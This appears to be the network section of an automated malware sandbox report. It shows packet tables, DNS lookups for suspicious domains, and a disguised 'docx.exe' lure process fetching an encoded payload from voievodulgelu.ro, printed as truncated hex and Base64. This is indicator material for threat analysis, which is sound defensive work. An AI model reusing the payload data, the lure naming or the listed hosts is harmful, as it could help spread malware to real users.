Nov 11, 2024 19:16:51.341845036 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341856956 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341866970 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.341875076 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341888905 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341900110 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.341901064 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341914892 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341926098 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341931105 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.341938019 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341949940 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341960907 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341970921 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341969967 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.341969967 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.342008114 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.342031002 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.342639923 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342653036 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342663050 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342677116 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342688084 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342694044 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.342700005 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342713118 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342724085 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342725992 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.342736006 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342747927 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342751980 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.342760086 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342762947 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.342772007 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342782974 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342792034 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.342794895 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342807055 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342817068 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342828035 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.342830896 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.342840910 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.342873096 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.343626976 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343638897 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343650103 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343661070 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343667030 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.343672991 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343684912 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343697071 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343707085 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.343708038 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343720913 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343733072 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343744040 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343750000 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.343756914 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343760967 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.343769073 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343780994 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343785048 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.343791962 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343801022 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.343806028 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.343842030 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.344476938 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.344489098 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.344502926 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.344521046 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.344526052 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.344535112 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.344547033 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.344554901 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.344575882 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.345006943 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345019102 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345029116 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345041990 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345052004 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345057011 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.345063925 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345076084 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345087051 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345088005 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.345098972 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.345098972 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345112085 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345118999 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.345124006 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345136881 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345148087 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345155954 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.345160961 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345174074 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345185995 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.345191002 CET   49733     80        192.168.2.4     77.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345227957 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345825911 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345839977 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345880985 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345885992 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345899105 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345910072 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345920086 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345921040 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345937967 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345958948 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345993042 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.375179052 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:56.345221996 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:56.349191904 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:59.864049911 CET4973380192.168.2.477.105.36.123
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 11, 2024 19:16:46.842540026 CET | 57903 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:16:46.865551949 CET | 53 | 57903 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:16:48.402046919 CET | 51256 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:16:49.408278942 CET | 51256 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:16:50.127655983 CET | 53 | 51256 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:16:50.128180027 CET | 53 | 51256 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:17:32.100327015 CET | 64168 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:17:32.110287905 CET | 53 | 64168 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:17:51.847595930 CET | 57162 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:17:52.182626963 CET | 53 | 57162 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:18:12.175898075 CET | 60681 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:18:12.199220896 CET | 53 | 60681 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:18:33.207046986 CET | 64333 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:18:33.230485916 CET | 53 | 64333 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:18:54.100953102 CET | 57566 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:18:54.124774933 CET | 53 | 57566 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:19:15.288335085 CET | 55510 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:19:15.312720060 CET | 53 | 55510 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:19:36.452917099 CET | 55657 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:19:36.462101936 CET | 53 | 55657 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:19:57.148802996 CET | 60644 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:19:57.171341896 CET | 53 | 60644 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:20:18.804894924 CET | 61737 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:20:18.824526072 CET | 53 | 61737 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:20:40.208863974 CET | 57927 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:20:40.227617979 CET | 53 | 57927 | 1.1.1.1 | 192.168.2.4
Nov 11, 2024 19:21:01.613037109 CET | 52460 | 53 | 192.168.2.4 | 1.1.1.1
Nov 11, 2024 19:21:01.637171030 CET | 53 | 52460 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 11, 2024 19:16:46.842540026 CET | 192.168.2.4 | 1.1.1.1 | 0x64e7 | Standard query (0) | voievodulgelu.ro | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:16:48.402046919 CET | 192.168.2.4 | 1.1.1.1 | 0xdccc | Standard query (0) | mbsngradnja.com | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:16:49.408278942 CET | 192.168.2.4 | 1.1.1.1 | 0xdccc | Standard query (0) | mbsngradnja.com | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:17:32.100327015 CET | 192.168.2.4 | 1.1.1.1 | 0xca6b | Standard query (0) | www.egos.design | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:17:51.847595930 CET | 192.168.2.4 | 1.1.1.1 | 0x9461 | Standard query (0) | www.xc31.top | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:18:12.175898075 CET | 192.168.2.4 | 1.1.1.1 | 0x2af9 | Standard query (0) | www.ursing-caregiver-jobs-za-3.bond | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:18:33.207046986 CET | 192.168.2.4 | 1.1.1.1 | 0xfa26 | Standard query (0) | www.trl-migrate.online | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:18:54.100953102 CET | 192.168.2.4 | 1.1.1.1 | 0x510f | Standard query (0) | www.r-outsourcing-69869.bond | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:19:15.288335085 CET | 192.168.2.4 | 1.1.1.1 | 0xa7b4 | Standard query (0) | www.apaescortatings.xyz | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:19:36.452917099 CET | 192.168.2.4 | 1.1.1.1 | 0x3dc | Standard query (0) | www.ynthia-mcc-lin-tick.link | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:19:57.148802996 CET | 192.168.2.4 | 1.1.1.1 | 0x834b | Standard query (0) | www.atingdilse.site | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:20:18.804894924 CET | 192.168.2.4 | 1.1.1.1 | 0x6a5b | Standard query (0) | www.joops.music | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:20:40.208863974 CET | 192.168.2.4 | 1.1.1.1 | 0xfb4c | Standard query (0) | www.upta.bio | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:21:01.613037109 CET | 192.168.2.4 | 1.1.1.1 | 0x4756 | Standard query (0) | www.9838.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 11, 2024 19:16:46.865551949 CET | 1.1.1.1 | 192.168.2.4 | 0x64e7 | No error (0) | voievodulgelu.ro |  | 92.114.2.230 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:16:50.127655983 CET | 1.1.1.1 | 192.168.2.4 | 0xdccc | No error (0) | mbsngradnja.com |  | 77.105.36.123 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:16:50.128180027 CET | 1.1.1.1 | 192.168.2.4 | 0xdccc | No error (0) | mbsngradnja.com |  | 77.105.36.123 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:17:32.110287905 CET | 1.1.1.1 | 192.168.2.4 | 0xca6b | Name error (3) | www.egos.design | none | none | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:17:52.182626963 CET | 1.1.1.1 | 192.168.2.4 | 0x9461 | Server failure (2) | www.xc31.top | none | none | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:18:12.199220896 CET | 1.1.1.1 | 192.168.2.4 | 0x2af9 | Name error (3) | www.ursing-caregiver-jobs-za-3.bond | none | none | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:18:33.230485916 CET | 1.1.1.1 | 192.168.2.4 | 0xfa26 | Name error (3) | www.trl-migrate.online | none | none | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:18:54.124774933 CET | 1.1.1.1 | 192.168.2.4 | 0x510f | Name error (3) | www.r-outsourcing-69869.bond | none | none | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:19:15.312720060 CET | 1.1.1.1 | 192.168.2.4 | 0xa7b4 | Name error (3) | www.apaescortatings.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:19:36.462101936 CET | 1.1.1.1 | 192.168.2.4 | 0x3dc | Name error (3) | www.ynthia-mcc-lin-tick.link | none | none | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:19:57.171341896 CET | 1.1.1.1 | 192.168.2.4 | 0x834b | Name error (3) | www.atingdilse.site | none | none | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:20:18.824526072 CET | 1.1.1.1 | 192.168.2.4 | 0x6a5b | Name error (3) | www.joops.music | none | none | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:20:40.227617979 CET | 1.1.1.1 | 192.168.2.4 | 0xfb4c | Name error (3) | www.upta.bio | none | none | A (IP address) | IN (0x0001) | false
Nov 11, 2024 19:21:01.637171030 CET | 1.1.1.1 | 192.168.2.4 | 0x4756 | Name error (3) | www.9838.xyz | none | none | A (IP address) | IN (0x0001) | false
• voievodulgelu.ro
• mbsngradnja.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 92.114.2.230 | 80 | 6928 | C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 19:16:46.910592079 CET | 165 | OUT | GET /244_Rgzwnbqrkpn HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: voievodulgelu.ro
Nov 11, 2024 19:16:47.585014105 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 18:16:47 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Wed, 06 Nov 2024 09:42:28 GMT
Accept-Ranges: bytes
Content-Length: 659248
Vary: Accept-Encoding
Keep-Alive: timeout=3, max=100
Data Raw: 73 62 6d 77 5a 43 36 79 76 46 59 61 47 78 30 67 4b 53 45 6f 4b 42 34 78 4c 79 4d 69 4c 69 67 76 4b 42 77 6a 4b 52 73 6a 48 69 77 6a 4b 79 6f 68 48 68 34 74 48 78 73 63 4a 43 49 73 48 68 34 67 4d 54 45 6b 4a 43 6b 6a 4a 68 6b 6f 4d 52 77 68 4a 78 6b 74 49 52 73 76 49 53 45 62 4b 79 55 64 4d 43 6f 69 4d 42 6b 77 4d 52 73 76 49 69 6f 5a 48 52 30 66 4c 69 67 6c 4a 53 34 6a 4b 69 55 5a 48 54 45 77 49 53 38 6e 47 53 77 65 4b 53 45 66 4c 79 77 6d 4a 52 73 6e 47 79 55 6f 49 52 6f 72 4b 43 4b 78 75 62 42 6b 4c 72 4b 38 56 67 6f 66 4d 69 38 6d 47 69 6b 71 49 79 67 6d 73 62 6d 77 5a 43 36 79 76 46 62 65 33 64 66 6b 79 2b 50 4d 7a 4e 72 54 79 65 58 6d 79 73 7a 4a 7a 4e 6a 6c 79 39 33 6c 32 73 6a 6c 7a 63 37 6a 32 74 72 48 32 64 33 59 34 4f 62 49 32 74 72 6b 30 39 50 67 34 4d 76 6c 34 74 76 4d 30 39 6a 6a 34 64 76 48 34 39 33 4a 34 2b 50 64 7a 64 2f 58 31 4d 37 6d 31 4e 76 55 30 39 33 4a 35 73 37 62 31 39 66 5a 79 73 7a 66 33 38 72 6c 7a 74 2f 62 31 39 50 55 34 38 6e 68 32 38 6a 61 79 2b 50 5a 79 63 6a 69 33 39 [TRUNCATED]
                                                                                                                                                Nov 11, 2024 19:16:47.585113049 CET1236INData Raw: 4d 7a 4e 72 54 79 65 58 6d 79 73 7a 4a 7a 4e 6a 6c 79 39 33 6c 32 73 6a 6c 7a 63 37 6a 32 74 72 48 32 64 33 59 34 4f 62 49 32 74 72 6b 30 39 50 67 34 4d 76 6c 34 74 76 4d 30 39 6a 6a 34 64 76 48 34 39 33 4a 34 2b 50 64 7a 64 2f 58 31 4d 37 6d 31
                                                                                                                                                Data Ascii: MzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszfw5DCWPm+bFpEFDAqel7NSvmmjTa1pJduXJXkjZsqHBqlIwfkDEK498PIy/ijWpQwNA/l4mWIwC5bsA5H/t7xKoTT920Cvrd2NR7+dfZ+pQEllbH+mJu5fkrgIhXN/qvpCnYxOL1ZsjqTaK
                                                                                                                                                Nov 11, 2024 19:16:47.585127115 CET1236INData Raw: 6e 68 6a 38 76 4a 71 51 4b 4f 6c 42 63 51 66 42 72 6a 6d 49 74 63 69 52 45 45 45 62 50 2f 6a 77 47 6e 63 37 41 41 56 47 2f 33 76 65 48 4d 42 73 4b 42 4d 50 71 43 6c 50 57 45 37 6c 64 76 59 66 46 6e 59 33 6e 7a 39 63 69 30 4d 69 32 52 63 69 2f 2b
                                                                                                                                                Data Ascii: nhj8vJqQKOlBcQfBrjmItciREEEbP/jwGnc7AAVG/3veHMBsKBMPqClPWE7ldvYfFnY3nz9ci0Mi2Rci/+SlfIzqTN86dlQkAbui9EUmg37cf3/kzoNy4pYiGDpE2PCrcniGnZ19XMILxULlsV2RWwnAsK9YGlYjYP/bPgiKyfBiTweW+mBwF8kTIEkx9iGDGWAif1qVvxAcKyoTVY0UkDCyCbrR7qbYZMIANzCZZ21MAekwOHU
                                                                                                                                                Nov 11, 2024 19:16:47.585717916 CET1236INData Raw: 6f 68 50 65 38 77 48 68 6f 79 41 6f 6d 45 31 59 37 59 33 2b 65 31 4c 37 38 49 4d 54 4c 36 75 46 39 62 51 48 2f 73 46 4d 77 6a 38 31 37 2f 6a 77 6e 61 30 50 48 39 48 6b 59 30 34 52 59 72 4b 50 64 46 43 44 33 6c 64 5a 6d 41 37 6f 6c 75 2b 30 55 33
                                                                                                                                                Data Ascii: ohPe8wHhoyAomE1Y7Y3+e1L78IMTL6uF9bQH/sFMwj817/jwna0PH9HkY04RYrKPdFCD3ldZmA7olu+0U3JB9oxCcOG5gUOPTAavCr+CprRWM8G+nHuQIyFAIR5T5BSRrkQQfdxgA621qzbqEy2aOD7wJjbxK6nTJAMfQ8qEHTeKbLAoO78qMJifvzYd6xhhuOzv8fGTGIKRxDUHXf6AC95/RYvCMeawUMh58js/ISQa/YczWUd
                                                                                                                                                Nov 11, 2024 19:16:47.585730076 CET1236INData Raw: 4f 77 79 6b 5a 2f 64 7a 49 4c 52 63 32 38 78 58 6e 62 58 59 6b 4d 69 33 76 65 48 4d 4b 73 42 75 58 56 7a 36 5a 4d 33 66 43 35 4b 44 6d 36 49 73 54 4e 6b 6a 52 65 79 58 2f 77 64 34 6b 58 36 52 49 31 79 69 32 55 70 50 63 6f 55 35 75 7a 76 70 58 77
                                                                                                                                                Data Ascii: OwykZ/dzILRc28xXnbXYkMi3veHMKsBuXVz6ZM3fC5KDm6IsTNkjReyX/wd4kX6RI1yi2UpPcoU5uzvpXwoM8Xlv+9vHoJaDb+RSNYdUlJgqrMYBDtNzlCU9ond1KIEMGZDoe+L2/ZtHJFVE4Z2Z5q9E5mWQGt7Rv7thNfFBRRdHqmb863Yy24rbIkxaRO3m6tePfThdgftQlBx91ORmRjP8D3qgM0yTkAVO5tU3cJANaMAREKA
                                                                                                                                                Nov 11, 2024 19:16:47.586484909 CET1060INData Raw: 55 58 65 4e 48 4d 61 4d 51 65 66 6d 46 6a 30 57 37 63 6b 47 56 58 61 56 54 61 67 54 62 61 4e 58 70 41 71 36 49 4e 63 67 64 56 6f 74 56 78 42 46 44 4d 4a 44 38 4c 75 4a 31 75 76 4a 6f 6f 4d 39 72 76 76 78 33 66 31 45 59 79 76 46 7a 4d 47 77 71 4b
                                                                                                                                                Data Ascii: UXeNHMaMQefmFj0W7ckGVXaVTagTbaNXpAq6INcgdVotVxBFDMJD8LuJ1uvJooM9rvvx3f1EYyvFzMGwqKHqLZVY9ei1gpwXF+44wJi7RAcWs2TH2v4BARa4q6/GgNGOrKo1GAQUq/bx7qW4ZFN8YZto7/Pjd5h/PEiDdew3sDy1I35fzW3tSXmc+PG1asrSTKqE+szlF5eaED8IFFeTE+oPmrkqf3X6ZYCU35hlk2TcxuRMeKm
                                                                                                                                                Nov 11, 2024 19:16:47.586498022 CET1236INData Raw: 68 68 70 79 53 2b 71 45 6b 6f 2f 62 68 31 38 6f 66 4a 4f 79 54 30 64 35 39 5a 2b 70 71 4b 54 50 71 56 77 42 37 55 61 78 4b 47 75 57 42 76 69 46 50 56 5a 33 6b 32 76 62 35 6d 43 32 4b 63 78 63 68 79 39 55 56 6d 47 41 63 39 73 72 65 35 76 71 77 32
                                                                                                                                                Data Ascii: hhpyS+qEko/bh18ofJOyT0d59Z+pqKTPqVwB7UaxKGuWBviFPVZ3k2vb5mC2Kcxchy9UVmGAc9sre5vqw22y6DjoKJ4Pfziowg35cbWEj2yz5bG0j6Gy78GkiKrxZtW83cjcAf6/G9l1k8hN4ndClpCxwQ3p4+iuZRhy6x69AQ11IWaH+BNKPIbq5dl7GLBD6E55XRRIOgBkKcXQhFEfDq9xsH+y6k6qiGvH/Dt8If4BiZE9sUj
                                                                                                                                                Nov 11, 2024 19:16:47.587115049 CET1236INData Raw: 6b 61 4f 4f 55 76 63 55 57 45 53 7a 56 2f 79 38 5a 48 59 6f 35 42 55 76 79 6b 4c 64 62 73 61 50 66 69 33 48 49 54 34 6c 4a 54 43 6c 65 6c 6a 57 48 54 49 42 44 34 58 63 6d 48 59 4c 6d 4e 33 49 71 66 53 6b 78 62 45 55 54 42 4a 4d 57 71 70 4c 56 70
                                                                                                                                                Data Ascii: kaOOUvcUWESzV/y8ZHYo5BUvykLdbsaPfi3HIT4lJTCleljWHTIBD4XcmHYLmN3IqfSkxbEUTBJMWqpLVpChTN0tXiKg4cZP/ksUh3CUTdMqascTB/Y+4nQl1rV38MJ8ClTnf0iv+EW9awZtdXfEDeoFAJsXcdnGfeW51uYG/hM1pnEXWQwnJpLiXWVPflInt2qzeiZQZuANnb+MRn4JHpW9TTFAGrQLJ7RD097YZu6LAKS/a/R
                                                                                                                                                Nov 11, 2024 19:16:47.587126970 CET1236INData Raw: 32 38 6c 72 4a 6b 56 78 2f 78 4f 64 6a 74 71 68 30 56 2b 45 56 77 36 72 30 34 33 75 78 58 50 48 4b 4a 33 35 78 57 70 31 65 43 2f 6a 66 32 62 30 51 43 61 6e 4d 68 34 31 75 41 7a 4f 48 69 68 66 78 47 57 47 43 34 65 78 68 69 68 73 45 41 59 63 4a 58
                                                                                                                                                Data Ascii: 28lrJkVx/xOdjtqh0V+EVw6r043uxXPHKJ35xWp1eC/jf2b0QCanMh41uAzOHihfxGWGC4exhihsEAYcJX2ummaiv0xYZDUW/6Ip3Orm/OeCRoEjx/JwMjueLvWoPvZ6YBkvemkC4DA7p6nIAtnBuZCW/guucRf9pNF1cA8VjLYz7WiEInM4JuWewWR6+TpgPnEgicZcSe8pKePJy46rOJGM1l9QhXuVYCzOeDqypWjkpEcrRDP
                                                                                                                                                Nov 11, 2024 19:16:47.587742090 CET1236INData Raw: 69 48 69 4d 4c 6c 4b 57 65 31 6e 4b 78 34 4e 6c 64 46 39 43 54 33 76 67 39 39 43 73 6a 49 71 72 59 4b 72 62 48 48 4f 4a 42 6c 76 70 58 71 4a 54 53 48 4c 32 41 73 50 31 56 2f 52 57 71 75 37 36 36 2b 72 74 4d 48 72 66 48 55 2b 57 55 78 31 2f 53 64
                                                                                                                                                Data Ascii: iHiMLlKWe1nKx4NldF9CT3vg99CsjIqrYKrbHHOJBlvpXqJTSHL2AsP1V/RWqu766+rtMHrfHU+WUx1/Sd6npkOgy+7Efhgp+KnOqt43r4kOk+PiWCvdsXhHUf5hbbBxY/sQR6sEd7LRQv7euQBDfzsaKnksGOTUWoEglqiXzAzrdeAY0egbibPYpMc9TNGg5h7Z92rvYpRaotzn9G+1F820ZgFyB2MAKBlq6uvGO2hxskgF4Sm
Nov 11, 2024 19:16:47.590157986 CET | 1236 | IN | Data Raw: 49 34 6a 69 47 30 4e 33 56 50 35 70 42 63 57 70 6c 6f 4f 33 50 45 59 79 39 39 6c 77 68 50 4e 54 44 6d 6f 47 35 6f 34 35 78 4b 53 58 74 71 2f 6e 4e 75 47 57 2b 57 35 75 74 54 4e 41 68 47 50 49 77 34 2f 4c 66 4c 56 7a 6b 76 75 65 52 69 38 64 30 57
